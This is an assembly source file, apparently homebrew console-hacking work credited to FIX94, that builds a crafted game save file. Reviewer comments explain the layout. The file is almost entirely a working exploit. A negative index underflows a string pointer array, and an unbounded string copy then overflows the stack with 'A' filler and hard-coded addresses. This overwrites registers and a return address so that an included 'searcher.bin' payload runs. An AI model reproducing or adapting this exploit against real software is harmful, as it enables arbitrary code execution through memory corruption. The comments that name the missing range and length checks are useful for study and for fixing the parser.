// Copyright 2016 FIX94
// This code is licensed to you under the terms of the GNU GPL, version 2;
// see file LICENSE or
// Data-only layout of a crafted save file; this file contains no instructions
// of its own, only .long/.byte/.fill data and two binary includes.
// Per the author's comments below, loading this save relies on two parser
// defects: an index field from the save that is used to address a string
// pointer array without a range check, and a string that is copied to the
// stack without a length bound.
// NOTE(review): every 0x80xxxxxx value below is a hard-coded absolute address;
// presumably they only hold for the exact game build this was written for.
// NOTE(review): rejecting out-of-range index values and bounding the string
// copy in the save loader would invalidate this layout.
.section .fstart,"ax"
// NOTE(review): fbegin is declared global but no "fbegin:" label is visible in
// this file; presumably the linker script or another object defines it - confirm.
.globl fbegin
0: // gci "header" we use
// raw bytes from an external file; NOTE(review): presumably the save
// container header for the target title - confirm against the build files
.incbin "ggye.hdr"
// save start
// these two words read as ASCII "UBIS" "OFT\0" when emitted big-endian
.long 0x55424953
.long 0x4F465400
// player name, will be used for pointer
// on mem to our overflow string
// (the same address is stored twice; 0x80DE2768 is where the author says the
// overflow string below ends up in memory)
.long 0x80DE2768 //will be 0x8053C414 on stack
.long 0x80DE2768 //will be 0x8053C418 on stack
// NOTE(review): presumably the terminator of the player name field - confirm
.byte 0
// save settings
.short 0x5249
.long 1 ; .long 0
.long 1 ; .long 0
.long 1 ; .long 0
.long 3 ; .long 0
.long 0
// this index underflows a string pointer array at 0x80DE1F70 to point to the
// player name on stack (0x8053C414) where we set pointers to our overflow string
// (0xFFF47863 has the top bit set, so it is negative as a signed 32-bit value;
// a loader that only checks an upper bound on a signed index would accept it)
.long 0xFFF47863
// more settings
// 0x35 (53) zero bytes
.fill 0x35,1,0x00
// time to set up our overflow string at 0x80DE2768
// 0x80 (128) bytes of 0x41 ('A') filler
.fill 0x80,1,0x41
// r28, point to stack position of our code
.long 0x8053C384
// r29,r30,r31, stack store position, aren't using those
// 0x10 (16) bytes of 0x41 filler
.fill 0x10,1,0x41
// This function will execute code further down the stack
// NOTE(review): hard-coded code address; presumably this word overwrites a
// saved return address on the stack - confirm against the target routine
.long 0x802BFE24
// more overflow string filler
// 0xD (13) bytes of 0x41 filler
.fill 0xD,1,0x41
// this is actually required for the save to be "valid"
.byte 1
// last of the overflow string filler
// 0xE (14) bytes of 0x41 filler
.fill 0xE,1,0x41
// Our stack code searcher that gets executed from above
// raw bytes from an external file, not assembled here;
// NOTE(review): presumably built from a separate source before this file
.incbin "searcher.bin"